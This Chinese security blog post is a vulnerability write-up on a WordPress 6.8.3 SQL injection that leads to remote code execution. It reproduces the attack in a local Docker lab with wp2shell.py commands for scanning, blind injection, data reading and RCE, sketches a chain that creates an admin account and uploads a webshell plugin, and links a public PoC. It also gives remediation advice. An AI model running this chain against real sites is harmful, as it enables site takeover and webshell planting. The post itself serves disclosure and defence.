文章总结: WordPress6.8.3版本存在高危SQL注入漏洞,攻击者可通过batch/v1路由利用author_exclude参数进行时间盲注,最终实现远程代码执行并完全接管网站管理员权限。漏洞利用链涉及oEmbed和changeset等机制。建议立即升级WordPress或应用修补意见,包括对相关路由实施参数白名单、使用参数化接口修复SQL注入点、隔离关键副作用并加强认证与提权控制。 综合评分: 87 文章分类: 漏洞分析,WEB安全,漏洞预警,解决方案
高危预警!WordPress最新SQL注入漏洞可直接接管网站管理员权限
原创
zz zz
星络安全实验室
2026年7月19日 15:40 重庆
在小说阅读器读本章
去阅读
| | | — | | 免责声明:文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,未授权的攻击属于非法行为!文章中敏感信息均已做多层打码处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责作者不为此承担任何责任,一旦造成后果请自行负责 |
1. 环境
-
主机:Linux
-
Docker:
28.2.2 -
Docker Compose:
v2.40.2 -
靶场端口:
http://127.0.0.1:8080 -
WordPress:
6.8.3-php8.2-apache -
数据库:
mariadb:11.4
2. 靶场搭建
启动命令
docker compose -f poc/lab/docker-compose.yml up -ddocker compose -f poc/lab/docker-compose.yml run --rm wpcli wp core install \ --url=http://127.0.0.1:8080 \ --title=wp2shell-lab \ --admin_user=admin \ --admin_password='Summer2026!' \ [email protected] \ --skip-emaildocker compose -f poc/lab/docker-compose.yml run --rm wpcli wp post create \ --post_title='Hello lab' \ --post_content='wp2shell local lab' \ --post_status=publish
#
3. 漏洞复现过程
3.1 暴露面确认
python3 wp2shell.py --scan http://127.0.0.1:8080
结果:识别到目标版本并确认 batch/v1 路由可达。
3.2 时间盲注确认
python3 wp2shell.py --check http://127.0.0.1:8080 --delay 0.5 --timeout 10
结果:快慢请求存在稳定时间差,确认盲注可用。
3.3 数据读取
python3 wp2shell.py --read http://127.0.0.1:8080 --expr @@version --max-len 32 --delay 0.2 --timeout 10
结果:读取到数据库版本 11.4.12-MariaDB-ubu2404。
3.4 完整 RCE 链路
python3 wp2shell.py --rce http://127.0.0.1:8080 --cmd id -y --timeout 30
结果:脚本一次命令完成全链路,最终执行 id 得到 www-data。
4. 漏洞链路说明
漏洞链按以下顺序执行:
-
探测
batch/v1路由和盲注可用性。 -
通过
author_exclude注入点进入 SQL 逻辑。 -
读取表前缀、管理员 ID、oEmbed cache 记录 ID。
-
构造
customize_changeset和request相关伪造行。 -
利用
oEmbed -> changeset -> re-entry(parse_request)创建管理员。 -
登录后上传 webshell 插件并执行命令。
poc:https://github.com/ZephrFish/wp2shell-scanner.git
5. 修补意见
5.1 路由与参数白名单
-
对
/batch/v1相关请求增加严格参数校验。 -
拒绝嵌套 batch、畸形
path、以及author_exclude这类不应透传到查询层的输入。
5.2 SQL 注入点修复
-
所有参与
WP_Query、prepare()或 REST 转发的参数必须使用参数化接口。 -
避免把用户输入拼接到
NOT IN、IN、ORDER BY、LIMIT等敏感片段。
5.3 关键副作用隔离
-
oEmbed、
changeset、request等机制不应在未授权上下文下触发写库。 -
对 REST batch 的执行路径增加上下文检查,防止路由混淆导致权限边界失效。
5.4 认证与提权控制
-
管理员创建、插件上传、REST 写操作都应要求明确权限校验。
-
对高危操作增加审计日志,便于后续追踪异常请求链。
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:星络安全实验室 zz zz《高危预警!WordPress最新SQL注入漏洞可直接接管网站管理员权限》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。











评论